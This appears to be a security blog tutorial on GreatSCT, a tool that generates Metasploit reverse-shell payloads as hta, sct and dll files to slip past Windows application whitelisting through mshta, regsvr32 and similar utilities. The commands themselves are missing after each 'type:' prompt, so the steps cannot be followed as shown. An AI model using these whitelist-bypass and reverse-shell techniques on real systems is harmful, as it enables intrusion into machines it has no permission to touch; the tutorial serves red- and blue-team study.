Tutorial

GreatSct – An Application Whitelist Bypass Tool

While writing Applocker bypass series, we found a new tool which was especially designed for bypassing whitelisting application.  So I Decided to write this article where we are introducing another most interesting tool “Great SCT –A Metasploit payload generator” tool which is similar to Unicorn or msfvenom because it depends on the metasploit framework to provide reverse connection of the victim’s machine. So let’s began with its tutorial and check its functionality.

Table of Content

  • GreatSCT
  • Installation & Usages
  • Generate malicious hta file
  • Generate malicious sct file
  • Generate malicious dll file

GreatSCT

GreatSCT is current under support by @ConsciousHacker, the project is called Great SCT (Great Scott). Great SCT is an open source project to generate application whitelist bypasses. This tool is intended for BOTH red and blue team. It is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions.

You can download it from here: https://github.com/GreatSCT/GreatSCT

Installation & Usages

It must first be downloaded and installed in order to start using Great SCT. Run following command to download Great SCT from github and also take care of its dependency tools while installing it.

This help to bypass Applocker policy by using following tools:

  • Installutil.exe : The Installer tool is a command- line tool that lets you to install and uninstall server resources in specific assemblies by running the installer components.
  • Msbuild.exe : The Microsoft Build Engine is a platform for building applications. This engine, which is also known as MSBuild.
  • Mshta.exe : Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA( HTML Application) files. HTML files that we can run JavaScript or Visual with.
  • Regasm.exe : The Assembly Registration tool reads the metadata within an assembly and adds the necessary entries to the registry, which allows COM clients to create .NET Framework classes transparently. 
  • Regsvcs.exe : RegSvcs stands for Microsoft .NET Remote Registry Services it is known for .NET Services Installation.
  • Regsvr32.exe : Regsvr32 is a command line utility for register and unregister OLE controls in the Windows Registry, such as DLLs and ActiveX controls.

Once it’s downloaded, type the following command to access the help commands:

Now to get the list of payloads type :

Generate malicious hta file 

Now from the list of payloads, you can choose anyone for your desired attack. But for this attack we will use :

Once the command is execute, type :

After executing the generate command, it asks you which method you want to use. As we will use msfvenom type 1 to choose the first option. Then click enter for meterpreter. Then supply lhost and lport, i.e. 192.168.1.107, 4321 respectively.

When generating the shellcode, it will ask you to give a name for a payload. By default it will take ‘payload’ as name. As I didn’t wanted to give any name, I simply pressed enter.

Now, it made two files. One resource file and other an hta file.

Now, firstly, start the python’s server in /usr/share/greatsct-output by typing:

Now execute the hta file in the command prompt of the victim’s PC.

Simultaneously, start the multi/handler using resource file. For this, type:

And voila! You have your session.

Visit here “Bypass Application Whitelisting using mshta.exe (Multiple Methods)” to learn more about mshta.exe techniques.

Generate malicious sct file 

Now from the list of payloads, you can choose anyone for your desired attack. But for this attack we will use :

Once the command is execute, type :

Then it will ask you for payload. Just press enter as it will take windows/meterpreter/reverse_tcp as a default payload and that is the one we need. After that provide IP like here we have given 192.168.1.107 and the give port (any) as here you can see in the image below that we have given lport as 2345

After giving the details, it will ask you name for your malware. By default it will set name ‘payload’ so either you can give name or just press enter for the default settings.

And just as you press enter it will generate two files. One of them will a resource file and other will be .sct file. Now start the python’s server in /usr/share/greatsct-output by typing:

Now execute the .sct file in the run window of the victim’s PC as shown below

Simultaneously, start the multi/handler using resource file. For this, type:

And voila! You have your session.

Visit here “Bypass Application Whitelisting using regsrv32.exe (Multiple Methods)” to learn more about mshta.exe techniques.

Generate malicious dll file 

Now from the list of payloads, you can choose anyone for your desired attack. But for this attack we will use :

Once the command is execute, type:

After giving the details, it will ask you a name for your malware. By default it will set name ‘payload’ so either you can give name or just press enter for the default settings.

And just as you press enter it will generate two files. One of them will a resource file and other will be .dll file.

Now start the python’s server in /usr/share/greatsct-output by typing:

Now place above generated dll file inside : C:WindowsMicrosoft.NETFrameworkv4.0.30319v4.0.30319 and then  execute the .dll file in the run window of the victim’s PC as shown below:

Simultaneously, start the multi/handler using resource file. For this, type:

And voila! You have your session.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

You Might Also Like

Leave a Reply